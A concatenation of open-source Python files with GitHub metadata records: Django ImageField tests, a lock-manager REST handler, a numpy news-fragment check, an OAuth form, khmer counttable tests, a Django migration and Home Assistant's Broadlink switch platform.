        self.file1 = self.File(open(os.path.join(tests_dir, "4x8.png"), 'rb'))
        self.file2 = self.File(open(os.path.join(tests_dir, "8x4.png"), 'rb'))

    def tearDown(self):
        """
        Close the fixture files and remove the temp directory with all its
        contents.
        """
        self.file1.close()
        self.file2.close()
        shutil.rmtree(temp_storage_dir)

    def check_dimensions(self, instance, width, height, field_name='mugshot'):
        """
        Assert that width/height match both the image field's own attributes
        and any cached dimension model fields.

        Dimension fields are located by naming convention: the ImageField's
        name plus "_width" / "_height" (the test models follow this).
        By default the field named "mugshot" is checked; pass field_name to
        check another field.
        """
        field = getattr(instance, field_name)
        if width is None and height is None:
            # An empty image field must raise when its dimensions are read.
            with self.assertRaises(ValueError):
                field.width
            with self.assertRaises(ValueError):
                field.height
        else:
            for attr, expected in (('width', width), ('height', height)):
                self.assertEqual(getattr(field, attr), expected)
        # Check the cached dimension model fields, when the model defines them.
        for suffix, expected in (('_width', width), ('_height', height)):
            cache_field = field_name + suffix
            if hasattr(instance, cache_field):
                self.assertEqual(getattr(instance, cache_field), expected)
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldTests(ImageFieldTestMixin, TestCase):
    """
    Tests for ImageField that don't need to be run with each of the
    different test model classes.
    """

    def test_equal_notequal_hash(self):
        """
        Bug #9786: Ensure '==' and '!=' work correctly.
        Bug #9508: make sure hash() works as expected (equal items must
        hash to the same value).
        """
        # Create two Persons with different mugshots.
        p1 = self.PersonModel(name="Joe")
        p1.mugshot.save("mug", self.file1)
        p2 = self.PersonModel(name="Bob")
        p2.mugshot.save("mug", self.file2)
        self.assertEqual(p1.mugshot == p2.mugshot, False)
        self.assertEqual(p1.mugshot != p2.mugshot, True)
        # Test again with an instance fetched from the db.
        p1_db = self.PersonModel.objects.get(name="Joe")
        self.assertEqual(p1_db.mugshot == p2.mugshot, False)
        self.assertEqual(p1_db.mugshot != p2.mugshot, True)
        # Instance from db should match the local instance.
        self.assertEqual(p1_db.mugshot == p1.mugshot, True)
        self.assertEqual(hash(p1_db.mugshot), hash(p1.mugshot))
        self.assertEqual(p1_db.mugshot != p1.mugshot, False)

    def test_instantiate_missing(self):
        """
        If the underlying file is unavailable, the object can still be
        instantiated without error.
        """
        p = self.PersonModel(name="Joan")
        p.mugshot.save("shot", self.file1)
        p = self.PersonModel.objects.get(name="Joan")
        path = p.mugshot.path
        # Make the stored file disappear, then re-fetch: must not raise.
        shutil.move(path, path + '.moved')
        self.PersonModel.objects.get(name="Joan")

    def test_delete_when_missing(self):
        """
        Bug #8175: correctly delete an object where the file no longer
        exists on the file system.
        """
        p = self.PersonModel(name="Fred")
        p.mugshot.save("shot", self.file1)
        os.remove(p.mugshot.path)
        p.delete()

    def test_size_method(self):
        """
        Bug #8534: FileField.size should not leave the file open.
        """
        p = self.PersonModel(name="Joan")
        p.mugshot.save("shot", self.file1)
        # Get a "clean" model instance
        p = self.PersonModel.objects.get(name="Joan")
        # It won't have an opened file.
        self.assertEqual(p.mugshot.closed, True)
        # After asking for the size, the file should still be closed.
        p.mugshot.size
        self.assertEqual(p.mugshot.closed, True)

    def test_pickle(self):
        """
        Tests that ImageField can be pickled, unpickled, and that the
        image of the unpickled version is the same as the original.
        """
        import pickle
        p = Person(name="Joe")
        p.mugshot.save("mug", self.file1)
        dump = pickle.dumps(p)
        # (A second, never-asserted Person instance was removed here: it was
        # dead code that played no part in the round-trip check below.)
        loaded_p = pickle.loads(dump)
        self.assertEqual(p.mugshot, loaded_p.mugshot)
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldTwoDimensionsTests(ImageFieldTestMixin, TestCase):
    """
    Tests behavior of an ImageField and its dimensions fields.

    Subclasses rerun the same tests against models with fewer (or
    differently ordered) dimension fields by overriding PersonModel.
    """

    def test_constructor(self):
        """
        Tests assigning an image field through the model's constructor.
        """
        p = self.PersonModel(name='Joe', mugshot=self.file1)
        self.check_dimensions(p, 4, 8)
        p.save()
        self.check_dimensions(p, 4, 8)

    def test_image_after_constructor(self):
        """
        Tests behavior when image is not passed in constructor.
        """
        p = self.PersonModel(name='Joe')
        # TestImageField value will default to being an instance of its
        # attr_class, a TestImageFieldFile, with name == None, which will
        # cause it to evaluate as False.
        self.assertIsInstance(p.mugshot, TestImageFieldFile)
        self.assertEqual(bool(p.mugshot), False)
        # Test setting a fresh created model instance.
        p = self.PersonModel(name='Joe')
        p.mugshot = self.file1
        self.check_dimensions(p, 4, 8)

    def test_create(self):
        """
        Tests assigning an image in Manager.create().
        """
        p = self.PersonModel.objects.create(name='Joe', mugshot=self.file1)
        self.check_dimensions(p, 4, 8)

    def test_default_value(self):
        """
        Tests that the default value for an ImageField is an instance of
        the field's attr_class (TestImageFieldFile in this case) with no
        name (name set to None).
        """
        p = self.PersonModel()
        self.assertIsInstance(p.mugshot, TestImageFieldFile)
        self.assertEqual(bool(p.mugshot), False)

    def test_assignment_to_None(self):
        """
        Tests that assigning ImageField to None clears dimensions.
        """
        p = self.PersonModel(name='Joe', mugshot=self.file1)
        self.check_dimensions(p, 4, 8)
        # If image assigned to None, dimension fields should be cleared.
        p.mugshot = None
        self.check_dimensions(p, None, None)
        p.mugshot = self.file2
        self.check_dimensions(p, 8, 4)

    def test_field_save_and_delete_methods(self):
        """
        Tests assignment using the field's save method and deletion using
        the field's delete method.
        """
        p = self.PersonModel(name='Joe')
        p.mugshot.save("mug", self.file1)
        self.check_dimensions(p, 4, 8)
        # A new file should update dimensions.
        p.mugshot.save("mug", self.file2)
        self.check_dimensions(p, 8, 4)
        # Field and dimensions should be cleared after a delete.
        p.mugshot.delete(save=False)
        self.assertEqual(p.mugshot, None)
        self.check_dimensions(p, None, None)

    def test_dimensions(self):
        """
        Checks that dimensions are updated correctly in various situations.
        """
        p = self.PersonModel(name='Joe')
        # Dimensions should get set if file is saved.
        p.mugshot.save("mug", self.file1)
        self.check_dimensions(p, 4, 8)
        # Test dimensions after fetching from database.
        p = self.PersonModel.objects.get(name='Joe')
        # Bug 11084: Dimensions should not get recalculated if file is
        # coming from the database. We test this by checking if the file
        # was opened.
        self.assertEqual(p.mugshot.was_opened, False)
        self.check_dimensions(p, 4, 8)
        # After checking dimensions on the image field, the file will have
        # opened.
        self.assertEqual(p.mugshot.was_opened, True)
        # Dimensions should now be cached, and if we reset was_opened and
        # check dimensions again, the file should not have opened.
        p.mugshot.was_opened = False
        self.check_dimensions(p, 4, 8)
        self.assertEqual(p.mugshot.was_opened, False)
        # If we assign a new image to the instance, the dimensions should
        # update.
        p.mugshot = self.file2
        self.check_dimensions(p, 8, 4)
        # Dimensions were recalculated, and hence file should have opened.
        self.assertEqual(p.mugshot.was_opened, True)
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldNoDimensionsTests(ImageFieldTwoDimensionsTests):
    """
    Tests behavior of an ImageField with no dimension fields.
    """
    # Inherits every test unchanged; only the model under test differs.
    PersonModel = Person
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldOneDimensionTests(ImageFieldTwoDimensionsTests):
    """
    Tests behavior of an ImageField with one dimensions field.
    """
    # Model caches only the height; width assertions hit the field itself.
    PersonModel = PersonWithHeight
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldDimensionsFirstTests(ImageFieldTwoDimensionsTests):
    """
    Tests behavior of an ImageField where the dimensions fields are
    defined before the ImageField.
    """
    PersonModel = PersonDimensionsFirst
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldUsingFileTests(ImageFieldTwoDimensionsTests):
    """
    Tests behavior of an ImageField when assigning it a File instance
    rather than an ImageFile instance.
    """
    PersonModel = PersonDimensionsFirst
    # Plain File (not ImageFile): dimensions must still be detected.
    File = File
@skipIf(Image is None, "Pillow is required to test ImageField")
class TwoImageFieldTests(ImageFieldTestMixin, TestCase):
    """
    Tests a model with two ImageFields.
    """
    PersonModel = PersonTwoImages

    def test_constructor(self):
        """Both fields passed to the constructor get their dimensions set."""
        p = self.PersonModel(mugshot=self.file1, headshot=self.file2)
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, 8, 4, 'headshot')
        p.save()
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, 8, 4, 'headshot')

    def test_create(self):
        """Manager.create() populates dimensions for both fields."""
        p = self.PersonModel.objects.create(mugshot=self.file1,
                                            headshot=self.file2)
        self.check_dimensions(p, 4, 8)
        self.check_dimensions(p, 8, 4, 'headshot')

    def test_assignment(self):
        """Assigning or clearing one field does not disturb the other."""
        p = self.PersonModel()
        self.check_dimensions(p, None, None, 'mugshot')
        self.check_dimensions(p, None, None, 'headshot')
        p.mugshot = self.file1
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, None, None, 'headshot')
        p.headshot = self.file2
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, 8, 4, 'headshot')
        # Clear the ImageFields one at a time.
        p.mugshot = None
        self.check_dimensions(p, None, None, 'mugshot')
        self.check_dimensions(p, 8, 4, 'headshot')
        p.headshot = None
        self.check_dimensions(p, None, None, 'mugshot')
        self.check_dimensions(p, None, None, 'headshot')

    def test_field_save_and_delete_methods(self):
        """field.save()/delete() only affect the targeted field's dimensions."""
        p = self.PersonModel(name='Joe')
        p.mugshot.save("mug", self.file1)
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, None, None, 'headshot')
        p.headshot.save("head", self.file2)
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, 8, 4, 'headshot')
        # We can use save=True when deleting the image field with null=True
        # dimension fields and the other field has an image.
        p.headshot.delete(save=True)
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, None, None, 'headshot')
        p.mugshot.delete(save=False)
        self.check_dimensions(p, None, None, 'mugshot')
        self.check_dimensions(p, None, None, 'headshot')

    def test_dimensions(self):
        """
        Checks that dimensions are updated correctly in various situations.
        """
        p = self.PersonModel(name='Joe')
        # Dimensions should get set for the saved file.
        p.mugshot.save("mug", self.file1)
        p.headshot.save("head", self.file2)
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, 8, 4, 'headshot')
        # Test dimensions after fetching from database.
        p = self.PersonModel.objects.get(name='Joe')
        # Bug 11084: Dimensions should not get recalculated if file is
        # coming from the database. We test this by checking if the file
        # was opened.
        self.assertEqual(p.mugshot.was_opened, False)
        self.assertEqual(p.headshot.was_opened, False)
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, 8, 4, 'headshot')
        # After checking dimensions on the image fields, the files will
        # have been opened.
        self.assertEqual(p.mugshot.was_opened, True)
        self.assertEqual(p.headshot.was_opened, True)
        # Dimensions should now be cached, and if we reset was_opened and
        # check dimensions again, the file should not have opened.
        p.mugshot.was_opened = False
        p.headshot.was_opened = False
        self.check_dimensions(p, 4, 8, 'mugshot')
        self.check_dimensions(p, 8, 4, 'headshot')
        self.assertEqual(p.mugshot.was_opened, False)
        self.assertEqual(p.headshot.was_opened, False)
        # If we assign a new image to the instance, the dimensions should
        # update.
        p.mugshot = self.file2
        p.headshot = self.file1
        self.check_dimensions(p, 8, 4, 'mugshot')
        self.check_dimensions(p, 4, 8, 'headshot')
        # Dimensions were recalculated, and hence file should have opened.
        self.assertEqual(p.mugshot.was_opened, True)
        self.assertEqual(p.headshot.was_opened, True)
|
{
"content_hash": "416e264595bb5802d9023e15e78e6b6e",
"timestamp": "",
"source": "github",
"line_count": 447,
"max_line_length": 80,
"avg_line_length": 36.24384787472036,
"alnum_prop": 0.6361335720017283,
"repo_name": "krisys/django",
"id": "a27476ff8d23d1b4181cb0d31c256f162f9f7b0b",
"size": "16201",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tests/model_fields/test_imagefield.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52372"
},
{
"name": "HTML",
"bytes": "172129"
},
{
"name": "JavaScript",
"bytes": "255773"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11591744"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
from rdlm.request_handler import RequestHandler, admin_authenticated
from rdlm.lock import LOCK_MANAGER_INSTANCE
from rdlm.hal import Resource
class ResourcesHandler(RequestHandler):
    """Handler for the /resources collection URL."""

    SUPPORTED_METHODS = ['GET', 'DELETE']

    @admin_authenticated
    def delete(self):
        '''
        @summary: deals with DELETE request (deleting all resources)
        '''
        LOCK_MANAGER_INSTANCE.remove_all_resources()
        # 204: deleted, nothing to return.
        self.send_status(204)

    @admin_authenticated
    def get(self):
        '''
        @summary: deals with GET request (getting a JSON HAL of resources)
        '''
        collection = Resource(self.reverse_url("resources"))
        # Embed one HAL resource per known lock resource.
        for name in LOCK_MANAGER_INSTANCE.get_resources_names():
            as_dict = LOCK_MANAGER_INSTANCE.get_resource_as_dict(name)
            embedded = Resource(
                self.reverse_url("resource", as_dict['name']),
                {"name": as_dict['name']},
            )
            collection.add_embedded_resource("resources", embedded)
        self.set_header("Content-Type", "application/hal+json")
        self.finish(collection.to_json())
|
{
"content_hash": "0e0b1d31014c35c1d47838053595071d",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 97,
"avg_line_length": 37.645161290322584,
"alnum_prop": 0.6580976863753213,
"repo_name": "thefab/restful-distributed-lock-manager",
"id": "8be376bf6762201df4ebbbfc504ced857684ee00",
"size": "1349",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rdlm/resources_handler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53356"
}
],
"symlink_target": ""
}
|
import sys
import toml
import os
path = toml.load("pyproject.toml")["tool"]["towncrier"]["directory"]
fragments = os.listdir(path)
fragments.remove("README.rst")
fragments.remove("template.rst")
if fragments:
print("The following files were not found by towncrier:")
print(" " + " \n".join(fragments))
sys.exit(1)
|
{
"content_hash": "f9089254b77d4efb6a6aef92f57a9ead",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 68,
"avg_line_length": 23.928571428571427,
"alnum_prop": 0.6835820895522388,
"repo_name": "WarrenWeckesser/numpy",
"id": "c2e03154945d01770f3c765e0515be198c73aea5",
"size": "359",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tools/ci/test_all_newsfragments_used.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "9059444"
},
{
"name": "C++",
"bytes": "174989"
},
{
"name": "Fortran",
"bytes": "10884"
},
{
"name": "JavaScript",
"bytes": "16928"
},
{
"name": "Makefile",
"bytes": "4290"
},
{
"name": "Python",
"bytes": "8313055"
},
{
"name": "Shell",
"bytes": "9612"
},
{
"name": "sed",
"bytes": "5741"
}
],
"symlink_target": ""
}
|
from django import forms
class AuthorizeRequestTokenForm(forms.Form):
    """Form asking the user to authorize an OAuth request token.

    The token itself travels in a hidden field; the user only ticks the
    required ``authorize_access`` checkbox to grant access.
    """
    oauth_token = forms.CharField(widget=forms.HiddenInput)
    authorize_access = forms.BooleanField(required=True)
|
{
"content_hash": "2c7628e19b42693ed03d1d3cd359255d",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 59,
"avg_line_length": 31.5,
"alnum_prop": 0.7936507936507936,
"repo_name": "tttthemanCorp/CardmeleonAppEngine",
"id": "078fdf3fe9e897113544c1bcc742a560ffce41b4",
"size": "189",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "piston/authentication/oauth/forms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "92014"
},
{
"name": "Python",
"bytes": "4453096"
}
],
"symlink_target": ""
}
|
import random
from khmer import SmallCounttable
from . import khmer_tst_utils as utils
# This mostly tests the underlying NibbleStorage class
def test_single_add():
    """A freshly added k-mer must be counted exactly once."""
    table = SmallCounttable(4, 1e6, 4)
    table.add("AAAA")
    assert table.get("AAAA") == 1
def test_split_byte_murmur():
    """The two halves of a shared byte stay independent (murmur hash)."""
    table = SmallCounttable(4, 4, 1)
    # These k-mers were carefully chosen: their murmur hash values map to
    # consecutive count-table indices, i.e. the two nibbles of one byte.
    kmer_low, kmer_high = "AAAC", "AAAG"
    assert table.get_kmer_hashes(kmer_low) == [11898086063751343884]
    assert table.get_kmer_hashes(kmer_high) == [10548630838975263317]
    table.add(kmer_low)
    # Incrementing one nibble must leave its neighbour at zero.
    assert table.get(kmer_low) == 1
    assert table.get(kmer_high) == 0
def test_overflow():
    """Saturating a 4-bit counter must not spill into the adjacent half-byte.

    The original test duplicated the same check twice (once per k-mer of
    the pair); this version runs the identical logic symmetrically in a
    single loop.
    """
    a = "AAAA"
    b = "AAAT"
    for bumped, untouched in ((a, b), (b, a)):
        sct = SmallCounttable(4, 1e6, 4)
        # 17 additions would overflow a 4-bit counter; it must saturate at 15.
        for _ in range(17):
            sct.add(bumped)
        assert sct.get(bumped) == 15
        # The other k-mer of the pair must remain at zero.
        assert sct.get(untouched) == 0
def test_random_kmers():
    """Smoke-test add/get with random k-mers (bounds / out-of-range errors)."""
    rng = random.Random(1)  # fixed seed keeps the test deterministic
    table = SmallCounttable(20, 1e2, 4)
    kmers = ["".join(rng.choice("ACGT") for _ in range(20))
             for _ in range(400)]
    for kmer in kmers:
        table.add(kmer)
    for kmer in kmers:
        table.get(kmer)
def test_read_write():
    # Round-trip a populated table through save()/load() and verify the
    # restored table reports identical parameters and counts.
    rng = random.Random(1)
    sct = SmallCounttable(20, 1e2, 4)
    kmers = ["".join(rng.choice("ACGT") for _ in range(20))
             for n in range(400)]
    for kmer in kmers:
        sct.add(kmer)
    fname = utils.get_temp_filename('zzz')
    sct.save(fname)
    # load() reads the table's own parameters back from the file, so the
    # reloaded table must match sct exactly.
    sct2 = SmallCounttable.load(fname)
    assert sct.ksize() == sct2.ksize()
    for kmer in kmers:
        assert sct.get(kmer) == sct2.get(kmer)
|
{
"content_hash": "e08fd5a4dae9bec85619aca38650833d",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 74,
"avg_line_length": 23.225806451612904,
"alnum_prop": 0.6203703703703703,
"repo_name": "souravsingh/khmer",
"id": "24943bb24c0126fd69bfe3e3d225e0b6f9f8f578",
"size": "3880",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_nibblestorage.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "500623"
},
{
"name": "GLSL",
"bytes": "493"
},
{
"name": "Makefile",
"bytes": "22719"
},
{
"name": "Python",
"bytes": "1282062"
},
{
"name": "Roff",
"bytes": "9581"
},
{
"name": "Shell",
"bytes": "5544"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add the ReviewsComparison model (pairing two clinical annotation
    steps plus an optional gold-standard step) and make the clinical
    annotation's link to its ROIs review deletion-protected.
    """

    dependencies = [
        ('reviews_manager', '0014_auto_20170609_1336'),
    ]

    operations = [
        migrations.CreateModel(
            name='ReviewsComparison',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('creation_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('start_date', models.DateTimeField(default=None, null=True, blank=True)),
                ('completion_date', models.DateTimeField(default=None, null=True, blank=True)),
                # Tri-state: None = not yet compared, True/False = outcome.
                ('positive_match', models.NullBooleanField(default=None)),
                # PROTECT: a comparison blocks deletion of its annotation steps.
                ('review_1', models.OneToOneField(related_name='first_review', on_delete=django.db.models.deletion.PROTECT, to='reviews_manager.ClinicalAnnotationStep')),
                ('review_2', models.OneToOneField(related_name='second_review', on_delete=django.db.models.deletion.PROTECT, to='reviews_manager.ClinicalAnnotationStep')),
                ('review_3', models.OneToOneField(related_name='gold_standard', null=True, on_delete=django.db.models.deletion.PROTECT, default=None, blank=True, to='reviews_manager.ClinicalAnnotationStep')),
            ],
        ),
        migrations.AlterField(
            model_name='clinicalannotation',
            name='rois_review',
            field=models.ForeignKey(related_name='clinical_annotations', on_delete=django.db.models.deletion.PROTECT, to='reviews_manager.ROIsAnnotation'),
        ),
    ]
|
{
"content_hash": "671880bfd1db114ea3b335b228ce4504",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 208,
"avg_line_length": 51.75757575757576,
"alnum_prop": 0.6610070257611241,
"repo_name": "lucalianas/ProMort",
"id": "2a8bd429e79f14113afbf3f85fcbd1aa74250c80",
"size": "2831",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "promort/reviews_manager/migrations/0015_auto_20170719_1248.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23712"
},
{
"name": "HTML",
"bytes": "222239"
},
{
"name": "JavaScript",
"bytes": "486991"
},
{
"name": "Python",
"bytes": "738944"
}
],
"symlink_target": ""
}
|
"""Support for Broadlink switches."""
from __future__ import annotations
from abc import ABC, abstractmethod
import logging
from broadlink.exceptions import BroadlinkException
import voluptuous as vol
from homeassistant.components.switch import (
PLATFORM_SCHEMA,
SwitchDeviceClass,
SwitchEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_COMMAND_OFF,
CONF_COMMAND_ON,
CONF_HOST,
CONF_MAC,
CONF_NAME,
CONF_SWITCHES,
CONF_TIMEOUT,
CONF_TYPE,
STATE_ON,
Platform,
)
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from .const import DOMAIN
from .entity import BroadlinkEntity
from .helpers import data_packet, import_device, mac_address
_LOGGER = logging.getLogger(__name__)
# Legacy YAML option key; accepted (and deprecated) for schema validation only.
CONF_SLOTS = "slots"

# Schema of one user-defined IR/RF switch entry (name + optional packets).
SWITCH_SCHEMA = vol.Schema(
    {
        vol.Required(CONF_NAME): cv.string,
        vol.Optional(CONF_COMMAND_OFF): data_packet,
        vol.Optional(CONF_COMMAND_ON): data_packet,
    }
)

# Platform schema: host/slots/timeout/type are deprecated; only the MAC and
# the optional list of custom switches remain meaningful.
PLATFORM_SCHEMA = vol.All(
    cv.deprecated(CONF_HOST),
    cv.deprecated(CONF_SLOTS),
    cv.deprecated(CONF_TIMEOUT),
    cv.deprecated(CONF_TYPE),
    PLATFORM_SCHEMA.extend(
        {
            vol.Required(CONF_MAC): mac_address,
            vol.Optional(CONF_HOST): cv.string,
            vol.Optional(CONF_SWITCHES, default=[]): vol.All(
                cv.ensure_list,
                [SWITCH_SCHEMA],
            ),
        }
    ),
)
async def async_setup_platform(
    hass: HomeAssistant,
    config: ConfigType,
    async_add_entities: AddEntitiesCallback,
    discovery_info: DiscoveryInfoType | None = None,
) -> None:
    """Import the device and set up custom switches.

    This is for backward compatibility.
    Do not use this method.
    """
    mac_addr = config[CONF_MAC]
    host = config.get(CONF_HOST)
    user_switches = config.get(CONF_SWITCHES)
    if user_switches:
        # Stash the user-defined IR/RF switches keyed by MAC so that
        # async_setup_entry can pick them up later.
        by_mac = hass.data[DOMAIN].platforms.setdefault(Platform.SWITCH, {})
        by_mac.setdefault(mac_addr, []).extend(user_switches)
    else:
        _LOGGER.warning(
            "The switch platform is deprecated, except for custom IR/RF "
            "switches. Please refer to the Broadlink documentation to "
            "catch up"
        )
    if host:
        import_device(hass, host)
async def async_setup_entry(
    hass: HomeAssistant,
    config_entry: ConfigEntry,
    async_add_entities: AddEntitiesCallback,
) -> None:
    """Set up the Broadlink switch."""
    device = hass.data[DOMAIN].devices[config_entry.entry_id]
    dev_type = device.api.type
    entities: list[BroadlinkSwitch] = []
    if dev_type in {"RM4MINI", "RM4PRO", "RMMINI", "RMMINIB", "RMPRO"}:
        # Remotes only expose the user-defined IR/RF switches collected by
        # async_setup_platform (keyed by the device's MAC address).
        platform_data = hass.data[DOMAIN].platforms.get(Platform.SWITCH, {})
        for switch_config in platform_data.get(device.api.mac, {}):
            entities.append(BroadlinkRMSwitch(device, switch_config))
    elif dev_type == "SP1":
        entities.append(BroadlinkSP1Switch(device))
    elif dev_type in {"SP2", "SP2S", "SP3", "SP3S", "SP4", "SP4B"}:
        entities.append(BroadlinkSP2Switch(device))
    elif dev_type == "BG1":
        # BG1 power strip: two slots.
        entities = [BroadlinkBG1Slot(device, slot) for slot in range(1, 3)]
    elif dev_type == "MP1":
        # MP1 power strip: four slots.
        entities = [BroadlinkMP1Slot(device, slot) for slot in range(1, 5)]
    async_add_entities(entities)
class BroadlinkSwitch(BroadlinkEntity, SwitchEntity, RestoreEntity, ABC):
    """Common base for every Broadlink switch entity."""

    _attr_assumed_state = True
    _attr_device_class = SwitchDeviceClass.SWITCH

    def __init__(self, device, command_on, command_off):
        """Initialize the switch."""
        super().__init__(device)
        # Payloads handed to _async_send_packet for on/off requests.
        self._command_on = command_on
        self._command_off = command_off
        self._attr_name = f"{device.name} Switch"

    async def async_added_to_hass(self):
        """Restore the last known on/off state when added to hass."""
        last_state = await self.async_get_last_state()
        self._attr_is_on = last_state is not None and last_state.state == STATE_ON
        await super().async_added_to_hass()

    async def async_turn_on(self, **kwargs):
        """Turn on the switch."""
        if not await self._async_send_packet(self._command_on):
            return
        self._attr_is_on = True
        self.async_write_ha_state()

    async def async_turn_off(self, **kwargs):
        """Turn off the switch."""
        if not await self._async_send_packet(self._command_off):
            return
        self._attr_is_on = False
        self.async_write_ha_state()

    @abstractmethod
    async def _async_send_packet(self, packet):
        """Send a packet to the device."""
class BroadlinkRMSwitch(BroadlinkSwitch):
    """Representation of a Broadlink RM switch."""

    def __init__(self, device, config):
        """Initialize a user-defined IR/RF switch from its YAML config."""
        super().__init__(
            device, config.get(CONF_COMMAND_ON), config.get(CONF_COMMAND_OFF)
        )
        self._attr_name = config[CONF_NAME]

    async def _async_send_packet(self, packet):
        """Send a packet to the device; return True on success."""
        if packet is None:
            # An unconfigured command is treated as a successful no-op.
            return True
        try:
            await self._device.async_request(self._device.api.send_data, packet)
        except (BroadlinkException, OSError) as err:
            _LOGGER.error("Failed to send packet: %s", err)
            return False
        return True
class BroadlinkSP1Switch(BroadlinkSwitch):
    """Representation of a Broadlink SP1 switch."""

    def __init__(self, device):
        """Initialize the switch."""
        # SP1 has a single relay; the on/off payloads are the raw 1/0 values.
        super().__init__(device, 1, 0)
        self._attr_unique_id = self._device.unique_id

    async def _async_send_packet(self, packet):
        """Set the relay state; return True on success."""
        try:
            await self._device.async_request(self._device.api.set_power, packet)
        except (BroadlinkException, OSError) as err:
            _LOGGER.error("Failed to send packet: %s", err)
            return False
        return True
class BroadlinkSP2Switch(BroadlinkSP1Switch):
    """Representation of a Broadlink SP2 switch."""

    # SP2 reports its real power state, so it is not assumed.
    _attr_assumed_state = False

    def __init__(self, device, *args, **kwargs):
        """Initialize the switch."""
        super().__init__(device, *args, **kwargs)
        # Seed on/off from the coordinator's last poll ("pwr" flag).
        self._attr_is_on = self._coordinator.data["pwr"]

    def _update_state(self, data):
        """Update the state of the entity."""
        self._attr_is_on = data["pwr"]
class BroadlinkMP1Slot(BroadlinkSwitch):
    """Representation of a Broadlink MP1 slot."""

    _attr_assumed_state = False

    def __init__(self, device, slot):
        """Initialize one slot (1-4) of the MP1 power strip."""
        super().__init__(device, 1, 0)
        self._slot = slot
        # Coordinator data keys this slot's power flag as "s<slot>".
        self._attr_is_on = self._coordinator.data[f"s{slot}"]
        self._attr_name = f"{device.name} S{slot}"
        self._attr_unique_id = f"{device.unique_id}-s{slot}"

    def _update_state(self, data):
        """Refresh on/off from a coordinator snapshot."""
        self._attr_is_on = data[f"s{self._slot}"]

    async def _async_send_packet(self, packet):
        """Switch this slot's relay; return True on success."""
        try:
            await self._device.async_request(
                self._device.api.set_power, self._slot, packet
            )
        except (BroadlinkException, OSError) as err:
            _LOGGER.error("Failed to send packet: %s", err)
            return False
        return True
class BroadlinkBG1Slot(BroadlinkSwitch):
    """Representation of a Broadlink BG1 slot."""

    _attr_assumed_state = False

    def __init__(self, device, slot):
        """Initialize one outlet slot (1-2) of the BG1."""
        super().__init__(device, 1, 0)
        self._slot = slot
        # Coordinator data keys this slot's power flag as "pwr<slot>".
        self._attr_is_on = self._coordinator.data[f"pwr{slot}"]
        self._attr_name = f"{device.name} S{slot}"
        self._attr_device_class = SwitchDeviceClass.OUTLET
        self._attr_unique_id = f"{device.unique_id}-s{slot}"

    def _update_state(self, data):
        """Refresh on/off from a coordinator snapshot."""
        self._attr_is_on = data[f"pwr{self._slot}"]

    async def _async_send_packet(self, packet):
        """Set this slot's power state; return True on success."""
        try:
            await self._device.async_request(
                self._device.api.set_state, **{f"pwr{self._slot}": packet}
            )
        except (BroadlinkException, OSError) as err:
            _LOGGER.error("Failed to send packet: %s", err)
            return False
        return True
|
{
"content_hash": "d3edee4bbc27f882509fd0fe38d6d657",
"timestamp": "",
"source": "github",
"line_count": 282,
"max_line_length": 83,
"avg_line_length": 30.97517730496454,
"alnum_prop": 0.6244991413852318,
"repo_name": "rohitranjan1991/home-assistant",
"id": "6a015748bd0edbbdb88318f58c06022f3bea5b15",
"size": "8735",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/broadlink/switch.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1017265"
},
{
"name": "Python",
"bytes": "1051086"
},
{
"name": "Shell",
"bytes": "3946"
}
],
"symlink_target": ""
}
|
from gpiozero import LED
from gpiozero import Button
import time
import pigpio
import rotary_encoder
import uinput
